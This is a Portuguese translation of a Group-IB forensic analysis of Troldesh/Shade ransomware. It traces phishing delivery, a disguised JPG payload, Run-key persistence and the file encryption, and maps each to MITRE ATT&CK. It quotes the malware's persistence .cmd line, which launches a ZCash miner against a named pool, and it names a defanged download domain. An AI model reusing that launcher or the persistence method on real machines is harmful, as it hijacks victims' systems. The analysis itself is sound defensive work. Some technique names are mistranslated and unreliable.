Se você acompanha as
notícias , provavelmente conhece um novo ataque em larga escala contra empresas russas do vírus Troldesh ransomware (Shade), um dos mais populares bloqueadores de criptografia entre os cibercriminosos. Somente em junho, o Group-IB descobriu mais de 1.100 e-mails de phishing da Troldesh enviados em nome de funcionários das principais companhias aéreas, revendedores de automóveis e mídia.
Neste artigo, examinaremos os artefatos forenses que podem ser encontrados após um ataque Shade / Troldesh na mídia de um dispositivo comprometido e também compararemos as táticas e técnicas usadas pelos invasores com o MITRE ATT & CK.
Postado por
Oleg Skulkin , especialista forense líder do Group-IB
O Troldesh, também conhecido como Shade, XTBL, Trojan.Encoder.858, Da Vinci, No_more_ransome, é um vírus que criptografa arquivos no dispositivo infectado do usuário e requer um resgate para restaurar o acesso às informações. Campanhas recentes com o Troldesh mostraram que agora não apenas criptografa arquivos, mas também mineradores de criptomoedas e gera tráfego para sites para aumentar o tráfego e a receita da publicidade on-line.
A primeira vez que a atividade da Troldesh foi detectada por especialistas do Grupo IB em 2015, eles notaram que o vírus contornou com êxito as ferramentas de proteção antivírus. Os invasores mudavam regularmente o "empacotador" - um programa empacotador que reduz o tamanho do arquivo e dificultava a detecção e a reversão - por causa disso, os programas antivírus frequentemente o ignoravam. Até o final de 2018, o Troldesh se tornou um dos vírus mais populares e entrou com confiança nos três primeiros, juntamente com o RTM e o Pony. Os especialistas da PaloAlto Networks relataram que o Troldesh não está funcionando apenas para fins russos - entre os países afetados pelo ransomware estão os Estados Unidos, Japão, Índia, Tailândia e Canadá.
Vetor de infecção inicial
Normalmente, “Troldesh / Shade” é distribuído por e-mails de phishing com anexos maliciosos, por exemplo, arquivos protegidos por senha que contêm arquivos JS maliciosos, após a abertura da qual o cryptolocker é baixado e iniciado. O que isso significa? Seria uma boa idéia começar nosso estudo analisando os traços da abertura desses arquivos. Onde esses traços podem ser encontrados? Bem, por exemplo, em Jump Lists:
Dados extraídos do arquivo 5f7b5f1e01b83767.automaticDestinations-ms usando JLECmd
Portanto, vemos que o usuário abriu o arquivo com o nome "senha 11.rar sobre o pedido". Mas como ele entrou no sistema? O arquivo está localizado no diretório Downloads, provavelmente foi baixado da Internet. Vamos dar uma olhada no histórico do navegador:
Dados extraídos do arquivo WebCache01.dat usando o Belkasoft Evidence Center
Como você pode ver, o arquivo foi baixado usando o navegador Microsoft Edge e salvo no diretório Downloads. Além disso, logo antes do download, o usuário visitou o site de e-mail, portanto, o arquivo foi recebido por e-mail.
Assim, estamos lidando com a técnica mais comum: T1193 - “Acessório de caça submarina”.
Iniciar e ignorar os mecanismos de proteção
Se olharmos dentro do arquivo, encontraremos um arquivo JS com um nome quase idêntico. Para que o malware seja carregado e comece a funcionar, o usuário deve clicar duas vezes no arquivo especificado. Depois disso, “wscript.exe” iniciará o arquivo JS, que fará o download do arquivo malicioso do
mat.tradetoolsfx [.] Com e executará. Podemos encontrar algum vestígio disso no disco? Claro!
Vejamos o arquivo de pré-busca wscript.exe, focando nos arquivos com os quais ele interagiu:
<...>
\ VOLUME {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ MICROSOFT \ WINDOWS \ INETCACHE \ IE \ OEJ87644 \ 1C [1] .JPG
\ VOLUME {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ TEMP \ 7ZO84024637 \ DETALHES DO PEDIDO A.JS
<...>
Então, temos dois arquivos interessantes. Primeiro, agora sabemos o nome do arquivo JS que estava no arquivo morto e, segundo, descobrimos o nome do arquivo que ele baixou. É hora de descobrir de onde foi baixado. Vamos dar uma olhada no WebCache01.dat novamente:
Dados recuperados do WebCache01.dat usando ESEDatabaseView
Se decodificarmos o conteúdo do campo ResponseHeaders, obteremos o seguinte:
HTTP / 1.1 200 OK
Tipo de Conteúdo: image / jpeg
Comprimento do conteúdo: 1300656
ETag: "5ced19b6-13d8b0"
Segurança de transporte estrita: max-age = 31536000;
De fato, este não é um arquivo JPG, mas um arquivo executável que descriptografa e inicia uma instância do Shade.
Então, com quais técnicas estamos lidando aqui? Script (T1064), Execução do usuário (T1204) e Mascaramento (T1036).
Pino do sistema
O “Shade” usa uma maneira bastante trivial de corrigir o sistema - a chave do registro “Software \ Microsoft \ Windows \ CurrentVersion \ Run” (T1060). Já sabemos que o arquivo JS malicioso foi aberto pelo usuário "0136", portanto, dê uma olhada no arquivo correspondente "NTUSER.DAT":
O mecanismo de travamento no sistema detectado pelo Belkasoft Evidence Center
Mas isso não é tudo! Mais interessante:
O mecanismo de travamento no sistema detectado pelo Belkasoft Evidence Center
Como você pode ver na ilustração, há outra entrada interessante apontando para C: \ ProgramData \ SysWOW64 \ leWRX7w.cmd. Vamos ver o que há dentro deste arquivo:
echo CreateObject ("Wscript.Shell"). Execute "" ^ & WScript.Arguments (0) ^ & "", 0, False> "% TEMP% / pxNXSB.vbs" && start / WAIT wscript.exe "% TEMP% /pxNXSB.vbs "" C: \ Usuários \ 0136 \ AppData \ Roaming \ SOFTWA ~ 1 \ NHEQMI ~ 1.EXE -l eu1-zcash.flypool.org ∗ 333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.7B9D281 &% TEMP% \ pxNXSB.vbs "
Então, temos mais um arquivo. A julgar pelo seu conteúdo, é usado pelos atacantes para extrair a criptomoeda ZCash. Assim, mesmo que a vítima pague o resgate, os recursos do seu sistema ainda serão utilizados pelos invasores.
As consequências
Primeiro, “Shade” é um cryptoclocker, então a primeira coisa que chama sua atenção são muitos arquivos com as extensões “CRYPTED000007”, arquivos “Leia-me” e papéis de parede “frescos” na área de trabalho:
Um arquivo com esta imagem pode ser encontrado no diretório C: \ Users \% username% \ AppData \ Roaming. Com que equipamento estamos lidando? "Dados criptografados para impacto" (T1486).
Mas, como você já entendeu, "Shade" não é um armário de criptografia comum. Além do próprio cryptoclocker, também encontramos um mineiro, o que significa que vale a pena mencionar outra técnica - “seqüestro de recursos”.
MITRE ATT & CK
Nossa análise revelou várias táticas e técnicas dos distribuidores Shade, vamos resumir: